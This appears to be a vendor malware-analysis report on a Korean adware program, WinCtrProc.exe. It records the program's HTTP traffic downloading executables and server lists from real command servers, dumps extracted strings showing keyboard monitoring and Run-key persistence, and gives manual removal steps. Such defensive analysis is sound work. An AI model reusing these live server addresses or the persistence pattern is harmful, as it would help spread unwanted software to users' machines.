Last-Modified: Fri, 28 Nov 2014 05:30:13 GMT
Accept-Ranges: bytes
ETag: "3175062ccad01:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:15:02 GMT
Content-Length: 114144

<<< skipped >>>

GET /Download/Uninstall_Ctr.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: loadform.co.kr
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 28 Jul 2014 00:14:35 GMT
Accept-Ranges: bytes
ETag: "746f7e9f8a9cf1:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:26:24 GMT
Content-Length: 191984

<<< skipped >>>

GET /Config/ServerList.asp?uno=3030 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSTTAAQQ=DFCDJILDBKBEAIJCNMALDIJO; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:34 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..


GET /Config/AdNw/FcTimeLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.23
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 157
Content-Type: text/html
Server: Microsoft-IIS/8.0
Set-Cookie: ASPSESSIONIDQACSRTDC=KEBBKILDFLDOKHGLEAOFGIMG; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:44 GMT
5|5|60|hXXp://loadform.co.kr/Download,hXXp://220.73.162.2/Download,htt
p://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|
120|Y|Y|Y|Y|Y|Y..
....



GET /Config/NewConf/ProgramUpdateLab.asp?version=1681 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.23
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQACSRTDC=KEBBKILDFLDOKHGLEAOFGIMG


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:47 GMT
1681|WinCtrProc.exe..


GET /Config/AdNw/StakePsList.asp?uno=3 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: maketop.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCAQBCSAA=NOKPLHLDCIBHJNLODFPKMIEI; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:40 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..


GET /Config/ProgramGuard.asp?uno=3030&ver=0000&wver=5 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.46
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:10 GMT
Content-Length: 1160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=ks_c_5601-1987"/>..<title>
500 - .... .... .....</title>..<style type="text/css">..&l
t;!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvet
ica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15p
x;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;mar
gin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#00
0000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-f
amily:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-colo
r:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-co
ntainer{background:#FFF;width:96%;margin-top:8px;padding:10px;position
:relative;}..-->..</style>..</head>..<body>..<
div id="header"><h1>.... ....</h1></div>..<div
id="content">.. <div class="content-container"><fieldset&
gt;.. <h2>500 - .... .... .....</h2>.. <h3>.... ..
.. ........ ...... .... ...... .. .........</h3>.. </fieldset
></div>..</div>..</body>..</html>....


GET /Config/AdNw/StakePsList.asp?uno=5 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSTTAAQQ=MMCDJILDGFBIEHHEBNGIPCEL; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:43 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..


The PUP connects to the servers at the following location(s):

WinCtrProc.exe_600:

.text
`.data
.rsrc
MSVBVM60.DLL
InetCtlsObjects.Inet
WebBrowser1
SHDocVwCtl.WebBrowser
vb6ko.dll
ieframe.dll
WebBrowser
MSINET.OCX
KeywordForm
GetKeyState
shell32.dll
ShellExecuteA
EnumWindows
C:\Windows\System32\ieframe.oca
GetAsyncKeyState
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
C:\Windows\system32\MSINET.oca
GetWindowsDirectoryA
UpdateLayeredWindows
User32.DLL
WSOCK32.DLL
vb6stkit.dll
GetKeyboardState
URLEncode
VBA6.DLL
advapi32.dll
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
C:\Windows\system32\msvbvm60.dll\3
kernel32.dll
WinExec
2008:02:21 11:10:24
urlTEXT
MsgeTEXT
HhXXp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x='adobe:ns:meta/' x:xaptk='XMP toolkit 2.8.2-33, framework 1.5'>
<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>
<rdf:Description about='uuid:25326700-e021-11dc-8e7f-a474304460f4'
xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>
<xapMM:DocumentID>adobe:docid:photoshop:253266fe-e021-11dc-8e7f-a474304460f4</xapMM:DocumentID>
hXXp://
\WinCtrPrc(20140224)\WinCtrPrc\WinFormProcess.vbp
78E1BDD1-9941-11cf-9756-00AA00C00908
2.asp
3.asp
/config/formactive.asp?uno=
&url=
&keyword=
&keyno=
&kind=PORTAL
microsoft.com
/config/FormActive.asp?uno=
/config/FormActive_Distinct.asp?uno=
/config/Formactive_Distinct.asp?uno=
&kind=KEYWORD
st.asp?uno=
/Config/FormLocation.asp
/Config/AdNw/FcPimSLab.asp
/Config/newConf/UCg_LPrMLab.asp?user_no=
/Config/TransSiteString.asp?nation=
/Config/FileNameDataMicro.asp
SetDownValue.asp?uno=
software\microsoft\windows\currentversion\run
/Config/UrlEncodeDecode.asp?q=
/Config/MakeStartPage.asp?uno=
&key=
?keyword=
?key=
keyword=
/Config/MakeSearchPage.asp?uno=
/Config/MakeIcon.asp?uno=
[KEYWORD]
/Config/TargetDataConnect.asp?p=&uno=
/Config/MakeProgram.asp?uno=
%Program Files%\micrOLAb\SearchEngin\LanguageConvert
/Config/ServerList.asp?uno=
hXXp://koreaserver.kr
hXXp://domainserver.co.kr
hXXp://hostserver.kr
hXXp://mainserver.kr
hXXp://makevalue.com
hXXp://duzip.com
hXXp://maketop.kr
hXXp://itemprice.kr
2000-10-01
Software\Microsoft\Windows\currentversion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\Currentversion\Run
VB6KO.DLL
msvbvm60.dll
wshom.ocx
ERROR_URL
/advertisebanner/keyword/
/advertisedistinct/keyword/
InternetExplorer.Application
/Config/Pop_Key_MainPlatinum.asp?uno=
keyboard
/Config/Pop_Key_MainDistinct.asp?uno=
&distinct=keyword
error_url
hXXp://VVV.naver.com
/Config/ipget.asp?kn=first&usd=
Windows 32s
Windows 95/98
Windows NT
/config/keyword_platinum.asp?user_no=
[adminkeywordpop]
[/adminkeywordpop]
[keywordpop]
[/keywordpop]
/Config/ipget.asp?kn=every&usd=
MicroProCon.exe
MicroProProc.exe
RetainPt.exe
RetainComp.exe
00000001
in.asp?uno=
Software\Microsoft\Windows\currentversion\run
00000060
.asp?version=
.asp?user_no=
.asp?uno=
Error getting subkey value.
/Config/GuideSiteString.asp?p=
.dictionary
dic.daum
dic.naver
dic.nate
http:
https:
로
을
e.asp?p=
.asp?p=
roLab.asp?p=
Code.asp?p=
hXXps://
ode.asp?uno=
/Config/KeySt
ab.asp?p=
/Config/SiteLink_Code.asp?uno=
/Config/ConvertLanguagemicrOLAb.asp?p=
/Config/OvertureDataConnect.asp?p=&uno=
/Config/RankeyLink_Code.asp?uno=
/advertisebanner/keyword
/advertisedistinct/keyword
JOIN
KEYWORD
\Internet Explorer\iexplore.exe
WScript.Shell
%Program Files%\Internet Explorer\iexplore.exe
/Config/KeyStringmicrOLAbPop.asp?p=
wscript.shell
/Config/GolbalString.asp?p=
/Config/TransSiteString_Commit.asp?site=
/Config/FindBrowserCode.asp?p=
iexplorer.exe
PORTUGAL
from portugal
to portugal
opera
Error opening key.
firefox
chrome
mozilla
Chrome_OmniboxView
netpia.com
WinCtrProc.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    GuardConvert.exe:1104
    MicroProProc.exe:2020
    MicroProProc.exe:596
    MicroProCon.exe:1492
    %original file name%.exe:452
    WinCtrCon.exe:1684
    WinCtrProc.exe:600
    mscorsvw.exe:172
    irsetup.exe:956

  2. Delete the original PUP file.
  3. Delete or disinfect the following files created/modified by the PUP:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ServerList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\UCg_LPrMLab[1].htm (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrCon[1].exe (52969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\TransSiteString[1].htm (12 bytes)
    %Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (52969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\StakePsList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormLocation[1].htm (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\FcPimSLab[1].htm (157 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\ServerList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormChecktimemicroLab[1].htm (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\MicroProProc[1].exe (409017 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\ProgramUpdateLab[1].htm (21 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe (409017 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (1861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrProc[1].exe (418761 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\sTakeList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ProgramUpdateLab[1].htm (19 bytes)
    %Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (418761 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FcTimeLab[1].htm (157 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FormLocation[1].htm (5 bytes)
    %Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\UCg_LPrMLab[1].htm (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\FcPimSLab[1].htm (157 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\TransSiteString[1].htm (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\StakePsList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\keyword_platinum[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\Uninstall_Ctr[1].exe (89729 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe (2712 bytes)
    %System%\VB6KO.DLL (2712 bytes)
    %System%\MSINET.OCX (2784 bytes)
    %Documents and Settings%\%current user%\Application Data\GuardSupport\GuardConvert.exe (2784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.dat (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uniB4.tmp (15807 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.xml (930 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe (4102 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG1.JPG (2 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -GbRIWgPPC"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -GbRIWgPPC"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabCon" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe -yTJAOYH"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabProc" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe -yTJAOYH"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -HcSJXhQQ"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -HcSJXhQQ"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -aukbpz"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -aukbpz"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabCon" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabProc" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
